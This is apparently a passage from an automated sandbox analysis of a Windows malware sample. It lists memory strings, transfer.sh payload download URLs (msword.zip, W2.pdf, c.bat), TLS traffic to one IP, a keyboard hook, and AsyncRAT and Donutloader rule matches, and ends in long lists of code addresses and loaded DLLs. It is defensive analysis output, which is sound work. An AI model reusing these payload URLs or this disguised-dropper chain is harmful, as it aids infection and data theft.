Source: powershell.exe, 00000019.00000002.2630516536.000002BB66230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com0
Source: powershell.exe, 00000012.00000002.2047498345.00000277CA481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D1661C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4DAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1664032088.0000000004FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBsq
Source: powershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43EC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43F1A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43EC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43EA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1676975989.0000019D43EE8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1664032088.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047498345.00000277CC09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047498345.00000277CBDDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D167B15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D167DDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D167CB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020981AFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020981B7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020981959000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4F5ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4F66C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4F448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000012.00000002.2082244736.00000277E2CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microP
Source: powershell.exe, 00000012.00000002.2082244736.00000277E2CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microPackageManagementp
Source: powershell.exe, 00000001.00000002.1667721029.000000000603D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2073502677.00000277DA4F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2195135185.000001D176238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2327399027.0000020990074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43EC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000006.00000003.1676975989.0000019D43E72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000001.00000002.1664032088.0000000005127000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1664032088.00000000052FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh
Source: powershell.exe, 00000019.00000002.2632983547.000002BB66326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/
Source: cmd.exe, 00000003.00000002.1982197807.0000000002DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/mswor
Source: powershell.exe, 00000017.00000002.2370326584.00000209F2E79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2373840901.00000209F30E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2422417906.000002BB4C0A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2425477490.000002BB4C1F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2422417906.000002BB4C157000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2422417906.000002BB4C098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426232313.000002BB4DAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zip
Source: powershell.exe, 00000019.00000002.2422417906.000002BB4C0A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zip-
Source: msword.com, 00000011.00000002.2870305669.000002173B3C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zip2
Source: msword.com, 00000011.00000002.2870305669.000002173B35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipP
Source: powershell.exe, 00000017.00000002.2370326584.00000209F2DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipf:
Source: powershell.exe, 00000015.00000002.2211623578.000001D17EA54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipu
Source: powershell.exe, 00000015.00000002.2212510245.000001D17EAF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipurl2=
Source: powershell.exe, 00000012.00000002.2047287909.00000277C8CB5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109154502.000001D164A15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2373840901.00000209F30E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2425477490.000002BB4C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipurl2=https
Source: cmd.exe, 00000003.00000002.1982197807.0000000002DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipurl2=https://trans
Source: msword.com, 00000011.00000002.2876723368.000002177B296000.00000004.00000020.00020000.00000000.sdmp, msword.com, 00000011.00000002.2876723368.000002177B210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2107481179.000001D1647F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipurl2=https://transfer.sh/get/fHMB2lI9W3/W2.pdf
Source: msword.com, 00000011.00000002.2876607412.000002177AB80000.00000004.00000020.00020000.00000000.sdmp, msword.com, 00000011.00000003.1986580910.000002173B410000.00000004.00000020.00020000.00000000.sdmp, msword.com, 00000011.00000002.2876723368.000002177B210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047287909.00000277C8CB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2081259164.00000277E297C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2083126951.00000277E2D99000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047287909.00000277C8CB5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047454393.00000277CA470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2207869582.000001D17E7FA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109002574.000001D1649C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2212510245.000001D17EAB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109154502.000001D164A15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109154502.000001D164A10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2374492940.00000209F48F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2378905432.00000209F4DCF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2373840901.00000209F30E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2373840901.00000209F30E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2381867811.00000209F5052000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2384381218.00000209F50A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2627371615.000002BB6603A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2425477490.000002BB4C1F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipurl2=https://transfer.sh/get/fHMB2lI9W3/W2.pdfUSERDOMAI
Source: msword.com, 00000011.00000002.2868653733.000000C000012000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipurl2=https://transfer.sh/get/fHMB2lI9W3/W2.pdfkernel32.
Source: powershell.exe, 00000015.00000002.2107481179.000001D1647F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/WD631pf02G/msword.zipw
Source: powershell.exe, 00000001.00000002.1664032088.0000000005127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/YqLLdAKXyI/c.bat
Source: powershell.exe, 00000017.00000002.2370326584.00000209F2E79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2373840901.00000209F30E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2422417906.000002BB4C0A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2425477490.000002BB4C1F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2422417906.000002BB4C157000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2422417906.000002BB4C098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426232313.000002BB4DAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/fHMB2lI9W3/W2.pdf
Source: msword.com, 00000011.00000002.2870305669.000002173B35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/fHMB2lI9W3/W2.pdf(
Source: powershell.exe, 00000015.00000002.2107481179.000001D1647F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/fHMB2lI9W3/W2.pdf3
Source: powershell.exe, 00000015.00000002.2107481179.000001D1647F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/fHMB2lI9W3/W2.pdfG
Source: powershell.exe, 00000012.00000002.2046703762.00000277C8A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/fHMB2lI9W3/W2.pdfL
Source: msword.com, 00000011.00000002.2870305669.000002173B3C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/fHMB2lI9W3/W2.pdfN
Source: cmd.exe, 00000003.00000002.1982197807.0000000002DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/fHMB2lI9W3/W2.pdfUSE.
Source: msword.com, 00000011.00000002.2876723368.000002177B210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/fHMB2lI9W3/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAM
Source: powershell.exe, 00000012.00000002.2084084086.00000277E2E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/fHMB2lI9W3/W2.pdfUSERDOMAIN_wJPQ
Source: powershell.exe, 00000012.00000002.2084084086.00000277E2E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/getAw
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49734 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\msword\msword.com

System Summary

barindex
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
Source: 30.2.msword.exe.17fd2fbcdd8.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
Source: 17.2.msword.com.217627b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
Source: 30.2.msword.exe.17fd2eb0000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
Source: 17.2.msword.com.217627b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
Source: 30.2.msword.exe.cf0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 17.2.msword.com.e70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000011.00000002.2872815361.0000021760F20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001E.00000002.2870615547.0000017FABC00000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001E.00000002.2872402033.0000017FD2FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001E.00000002.2872006726.0000017FD2EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001E.00000002.2866315495.0000000000DC9000.00000004.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000011.00000002.2873533097.00000217627B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7384, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comFile dump: msword.exe.17.dr 503316480Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.comJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00ECA860 SetWaitableTimer,SetWaitableTimer,NtWaitForSingleObject,17_2_00ECA860
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00ECA820 NtWaitForSingleObject,17_2_00ECA820
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D4A860 SetWaitableTimer,SetWaitableTimer,NtWaitForSingleObject,30_2_00D4A860
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D4A820 NtWaitForSingleObject,30_2_00D4A820
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0356A2281_2_0356A228
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EA68C017_2_00EA68C0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E7B08017_2_00E7B080
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E9406017_2_00E94060
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E8404017_2_00E84040
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EB204017_2_00EB2040
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E9682017_2_00E96820
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EA802017_2_00EA8020
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E839E017_2_00E839E0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E8E94017_2_00E8E940
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EA990017_2_00EA9900
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E87AE017_2_00E87AE0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EC5A6917_2_00EC5A69
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E80A6017_2_00E80A60
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E7422017_2_00E74220
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E91A2017_2_00E91A20
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EB53C017_2_00EB53C0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EBB3A017_2_00EBB3A0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E74B0017_2_00E74B00
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E9DB0017_2_00E9DB00
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EA730017_2_00EA7300
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E944E017_2_00E944E0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E7FCC017_2_00E7FCC0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EA14A017_2_00EA14A0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E7BC4017_2_00E7BC40
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EA0C4017_2_00EA0C40
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E8442017_2_00E84420
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E7840017_2_00E78400
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EBCDE017_2_00EBCDE0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E90D6017_2_00E90D60
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EA456017_2_00EA4560
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E7A54017_2_00E7A540
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E9552017_2_00E95520
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EB650017_2_00EB6500
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E8A6C017_2_00E8A6C0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E8BEA017_2_00E8BEA0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EACFA017_2_00EACFA0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E74F8017_2_00E74F80
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00007FFD997B4D6B17_2_00007FFD997B4D6B
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00007FFD997B580D17_2_00007FFD997B580D
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00007FFD997B6C4517_2_00007FFD997B6C45
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD997D39D118_2_00007FFD997D39D1
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D268C030_2_00D268C0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00CFB08030_2_00CFB080
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D0404030_2_00D04040
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D3204030_2_00D32040
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D1406030_2_00D14060
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D1682030_2_00D16820
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D2802030_2_00D28020
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D039E030_2_00D039E0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D0E94030_2_00D0E940
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D2990030_2_00D29900
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D07AE030_2_00D07AE0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D00A6030_2_00D00A60
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D45A6930_2_00D45A69
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00CF422030_2_00CF4220
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D11A2030_2_00D11A20
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D353C030_2_00D353C0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D3B3A030_2_00D3B3A0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00CF4B0030_2_00CF4B00
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D1DB0030_2_00D1DB00
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D2730030_2_00D27300
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00CFFCC030_2_00CFFCC0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D144E030_2_00D144E0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D214A030_2_00D214A0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00CFBC4030_2_00CFBC40
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D20C4030_2_00D20C40
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00CF840030_2_00CF8400
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D0442030_2_00D04420
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D3CDE030_2_00D3CDE0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00CFA54030_2_00CFA540
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D10D6030_2_00D10D60
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D2456030_2_00D24560
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D3650030_2_00D36500
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D1552030_2_00D15520
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D0A6C030_2_00D0A6C0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D0BEA030_2_00D0BEA0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00CF4F8030_2_00CF4F80
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D2CFA030_2_00D2CFA0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: String function: 00EA1A60 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: String function: 00EA00A0 appears 443 times
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: String function: 00EA22E0 appears 695 times
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: String function: 00D21A60 appears 107 times
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: String function: 00D200A0 appears 443 times
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: String function: 00D222E0 appears 695 times
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
